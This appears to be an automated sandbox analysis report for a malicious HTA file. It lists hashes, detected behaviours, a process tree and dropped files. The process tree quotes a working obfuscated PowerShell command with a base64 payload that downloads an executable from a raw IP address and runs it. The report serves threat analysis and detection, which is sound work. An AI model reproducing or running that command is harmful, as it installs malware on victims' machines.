Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Resource
win10v2004-20241007-en
General
-
Target
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
-
Size
207KB
-
MD5
fcd22700962f05502dfd476b9fd35c11
-
SHA1
f338e2af10c4e6e35d7f8f6e3613516150aeea71
-
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
-
SHA512
8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19
-
SSDEEP
96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
POwersHeLl.ExEflow pid Process 15 3968 POwersHeLl.ExE -
Evasion via Device Credential Deployment 2 IoCs
Processes:
powershell.exePOwersHeLl.ExEpid Process 5060 powershell.exe 3968 POwersHeLl.ExE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exePOwersHeLl.ExEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwersHeLl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
POwersHeLl.ExEpowershell.exepid Process 3968 POwersHeLl.ExE 3968 POwersHeLl.ExE 5060 powershell.exe 5060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exedescription pid Process Token: SeDebugPrivilege 3968 POwersHeLl.ExE Token: SeDebugPrivilege 5060 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
mshta.exePOwersHeLl.ExEcsc.exedescription pid Process procid_target PID 3200 wrote to memory of 3968 3200 mshta.exe 85 PID 3200 wrote to memory of 3968 3200 mshta.exe 85 PID 3200 wrote to memory of 3968 3200 mshta.exe 85 PID 3968 wrote to memory of 5060 3968 POwersHeLl.ExE 88 PID 3968 wrote to memory of 5060 3968 POwersHeLl.ExE 88 PID 3968 wrote to memory of 5060 3968 POwersHeLl.ExE 88 PID 3968 wrote to memory of 1104 3968 POwersHeLl.ExE 93 PID 3968 wrote to memory of 1104 3968 POwersHeLl.ExE 93 PID 3968 wrote to memory of 1104 3968 POwersHeLl.ExE 93 PID 1104 wrote to memory of 3944 1104 csc.exe 94 PID 1104 wrote to memory of 3944 1104 csc.exe 94 PID 1104 wrote to memory of 3944 1104 csc.exe 94
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp" "c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3944
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
13KB
MD596b2f0a83736315afed33226cb021197
SHA1396373463b0f5f9627f5592eb89aafd56507aa20
SHA2569b44ef0b05e17a79c69ccb3b1940ad6b66eeb40e54a8854a0a9bf854c9220108
SHA51274db69ba9edc0fa69a5d6c468692fa24acaba3dd8f9099f32fa728714259f832068606d22adeb14976ab96be26215a1e9eb9551cf049f08894b4993f795444a6
-
Filesize
3KB
MD5145fe68db1e3360a7d472644b62dd45c
SHA18774f564706e16d1b71da942b31ecfb2e6fa6ed4
SHA256ed3254984a0b2ce127fa4fec1fadd3e40a04a320c185611d7279461019f7a951
SHA512e4f818499d5fd503b801b5505ad72909facc24598fb731bda7b9cd5e4bc1bb3c78bf7e751e6359bbba23dc28bbda1a1e2236195b9721e36bd31513596d1506f7
-
Filesize
1KB
MD534f33a6ed897ead12abe8b25165f5bbf
SHA1d354205cc95d473e450e5f1a036642d627248612
SHA25695aa5022ef00277999fb8dfa4da7b75961cfd6e6ce7451c12cf060bd02b19ed2
SHA512b76e6f5cb9c885f86c13529132bc1a7401879fdf38349aca66d2a4ca1aa67c72941292dfb7d6dadb45c628a297c7e09cf522fadec18fc24db6f1b0ea94482a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
473B
MD54af98cbe7b888e1e92e1aa8a35732223
SHA175d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA5121127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3
-
Filesize
369B
MD5a1d1dd60bb7da6fdd01bbf8e8e41fe2c
SHA1a2b6edfa7d9348752d2df54bf146fe3e624f27ca
SHA256d2c4a82f465f4902debaab261e11cba21dcdf9a91dc746847189cdb410d60ca5
SHA512734860982e6bf1e06ce962ab8a87dd12ed40f52b7d49eeafbdfa57341abeb54d9af19726ea786ff089e8a528b2d8164bd02220edeba55c564dfea536e7383aae
-
Filesize
652B
MD518a135d11fca8199ca0899ce38002751
SHA168c5991902e3012bd690dec62c50e0aa14ee1c13
SHA2562b6a9838681ca7dd29134382a42b80839d9aeac11fcace801eb6812c11b60219
SHA5125c024b26b02b1cc805f16cf6e5e36fefe5e2c0b0ab6087c6f50525b136eca8b886ff72e580b5c808c50c2ad07966addbc155516ce6fbc4a473acbe02c57c36e9